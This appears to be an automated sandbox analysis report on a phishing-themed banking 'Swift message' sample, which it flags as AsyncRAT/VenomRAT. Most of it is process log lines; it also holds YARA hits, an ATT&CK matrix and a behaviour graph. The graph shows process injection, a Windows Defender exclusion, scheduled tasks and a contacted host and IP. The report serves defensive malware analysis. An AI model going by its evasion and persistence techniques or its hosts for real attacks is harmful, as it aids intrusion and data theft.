                  Source: C:\Users\user\AppData\Roaming\regasms.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeQueries volume information: C:\Users\user\AppData\Roaming\regasms.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exeQueries volume information: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exe VolumeInformation
                  Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                  Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                  Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                  Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                  Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                  Source: C:\Users\user\AppData\Roaming\regasms.exeQueries volume information: C:\Users\user\AppData\Roaming\regasms.exe VolumeInformation
                  Source: C:\Users\user\AppData\Roaming\regasms.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                  Source: C:\Users\user\AppData\Roaming\regasms.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                  Source: C:\Users\user\AppData\Roaming\regasms.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                  Source: C:\Users\user\AppData\Roaming\regasms.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                  Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exeQueries volume information: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exe VolumeInformation
                  Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Users\user\AppData\Roaming\NotepadUpdate.exeQueries volume information: C:\Users\user\AppData\Roaming\NotepadUpdate.exe VolumeInformation
                  Source: C:\Users\user\AppData\Roaming\NotepadUpdate.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                  Source: C:\Users\user\AppData\Roaming\NotepadUpdate.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                  Source: C:\Users\user\AppData\Roaming\NotepadUpdate.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                  Source: C:\Users\user\AppData\Roaming\NotepadUpdate.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                  Source: C:\Users\user\AppData\Roaming\NotepadUpdate.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                  Source: C:\Windows\System32\rundll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                  Lowering of HIPS / PFW / Operating System Security Settings

                  barindex
                  Yara detected AsyncRAT
                  Source: Yara matchFile source: 15.2.regasms.exe.3230128.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 13.2.regasms.exe.28be350.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 13.2.regasms.exe.28d0c2c.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 21.2.AtkzppDHiyvcIR.exe.2937300.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 15.2.regasms.exe.321d84c.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 21.2.AtkzppDHiyvcIR.exe.2949bdc.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 13.2.regasms.exe.28d0c2c.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 20.2.regasms.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 13.2.regasms.exe.28be350.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 15.2.regasms.exe.3230128.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 15.2.regasms.exe.321d84c.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 21.2.AtkzppDHiyvcIR.exe.2949bdc.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 21.2.AtkzppDHiyvcIR.exe.2937300.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0000000D.00000002.1403401343.0000000002827000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000014.00000002.1519769182.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000F.00000002.1440771055.0000000003217000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000015.00000002.1540173205.0000000002935000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: regasms.exe PID: 6696, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: regasms.exe PID: 7260, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: AtkzppDHiyvcIR.exe PID: 7628, type: MEMORYSTR
                  Yara detected VenomRAT
                  Source: Yara matchFile source: Process Memory Space: regasms.exe PID: 7464, type: MEMORYSTR
                  Source: regasms.exe, 0000000D.00000002.1403401343.0000000002827000.00000004.00000800.00020000.00000000.sdmp, regasms.exe, 0000000F.00000002.1440771055.0000000003217000.00000004.00000800.00020000.00000000.sdmp, regasms.exe, 00000014.00000002.1519769182.0000000000402000.00000040.00000400.00020000.00000000.sdmp, AtkzppDHiyvcIR.exe, 00000015.00000002.1540173205.0000000002935000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: MSASCui.exe
                  Source: regasms.exe, 0000000D.00000002.1403401343.0000000002827000.00000004.00000800.00020000.00000000.sdmp, regasms.exe, 0000000F.00000002.1440771055.0000000003217000.00000004.00000800.00020000.00000000.sdmp, regasms.exe, 00000014.00000002.1519769182.0000000000402000.00000040.00000400.00020000.00000000.sdmp, AtkzppDHiyvcIR.exe, 00000015.00000002.1540173205.0000000002935000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: procexp.exe
                  Source: regasms.exe, 0000000D.00000002.1403401343.0000000002827000.00000004.00000800.00020000.00000000.sdmp, regasms.exe, 0000000F.00000002.1440771055.0000000003217000.00000004.00000800.00020000.00000000.sdmp, regasms.exe, 00000014.00000002.1519769182.0000000000402000.00000040.00000400.00020000.00000000.sdmp, AtkzppDHiyvcIR.exe, 00000015.00000002.1540173205.0000000002935000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: MsMpEng.exe
                  Source: C:\Users\user\AppData\Roaming\regasms.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

                  Mitre Att&ck Matrix

                  ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                  Gather Victim Identity Information1
                  Scripting                  		Valid Accounts131
                  Windows Management Instrumentation                  		1
                  Scripting                  		1
                  DLL Side-Loading                  		11
                  Disable or Modify Tools                  		1
                  Input Capture                  		1
                  File and Directory Discovery                  		Remote Services1
                  Archive Collected Data                  		1
                  Ingress Tool Transfer                  		Exfiltration Over Other Network MediumAbuse Accessibility Features
                  CredentialsDomainsDefault Accounts1
                  Native API                  		1
                  DLL Side-Loading                  		212
                  Process Injection                  		221
                  Obfuscated Files or Information                  		LSASS Memory24
                  System Information Discovery                  		Remote Desktop Protocol1
                  Input Capture                  		11
                  Encrypted Channel                  		Exfiltration Over BluetoothNetwork Denial of Service
                  Email AddressesDNS ServerDomain Accounts3
                  Scheduled Task/Job                  		3
                  Scheduled Task/Job                  		3
                  Scheduled Task/Job                  		12
                  Software Packing                  		Security Account Manager1
                  Query Registry                  		SMB/Windows Admin SharesData from Network Shared Drive1
                  Non-Standard Port                  		Automated ExfiltrationData Encrypted for Impact
                  Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
                  Timestomp                  		NTDS341
                  Security Software Discovery                  		Distributed Component Object ModelInput Capture2
                  Non-Application Layer Protocol                  		Traffic DuplicationData Destruction
                  Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                  DLL Side-Loading                  		LSA Secrets2
                  Process Discovery                  		SSHKeylogging3
                  Application Layer Protocol                  		Scheduled TransferData Encrypted for Impact
                  Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                  Masquerading                  		Cached Domain Credentials151
                  Virtualization/Sandbox Evasion                  		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                  DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items151
                  Virtualization/Sandbox Evasion                  		DCSync1
                  Application Window Discovery                  		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                  Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job212
                  Process Injection                  		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                  Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
                  Rundll32                  		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

                  Behavior Graph

                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet
                  behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1572391 Sample: Ziraat Bankasi Swift Mesaji... Startdate: 10/12/2024 Architecture: WINDOWS Score: 100 102 edge.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com 2->102 104 default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com 2->104 106 2 other IPs or domains 2->106 110 Suricata IDS alerts for network traffic 2->110 112 Found malware configuration 2->112 114 Malicious sample detected (through community Yara rule) 2->114 116 14 other signatures 2->116 12 loaddll64.exe 1 2->12         started        14 AtkzppDHiyvcIR.exe 2->14         started        17 NotepadUpdate.exe 2->17         started        signatures3 process4 signatures5 19 cmd.exe 1 12->19         started        21 rundll32.exe 12->21         started        24 conhost.exe 12->24         started        26 rundll32.exe 12->26         started        136 Multi AV Scanner detection for dropped file 14->136 138 Machine Learning detection for dropped file 14->138 140 Injects a PE file into a foreign processes 14->140 28 schtasks.exe 14->28         started        30 AtkzppDHiyvcIR.exe 14->30         started        32 AtkzppDHiyvcIR.exe 14->32         started        process6 signatures7 34 rundll32.exe 1 19->34         started        118 System process connects to network (likely due to code injection or exploit) 21->118 38 regasms.exe 4 21->38         started        41 conhost.exe 28->41         started        process8 dnsIp9 108 52575815-38-20200406120634.webstarterz.com 163.44.198.57, 443, 49700, 49701 GMO-Z-COM-THGMO-ZcomNetDesignHoldingsCoLtdSG Singapore 34->108 92 C:\Users\user\AppData\Roaming\regasms.exe, PE32 34->92 dropped 43 regasms.exe 6 34->43         started        120 Adds a directory exclusion to Windows Defender 38->120 122 Injects a PE file into a foreign processes 38->122 47 powershell.exe 38->47         started        49 regasms.exe 38->49         started        52 schtasks.exe 38->52         started        file10 signatures11 process12 dnsIp13 96 C:\Users\user\AppData\...\AtkzppDHiyvcIR.exe, PE32 43->96 dropped 98 C:\Users\user\AppData\Local\...\tmp18B1.tmp, XML 43->98 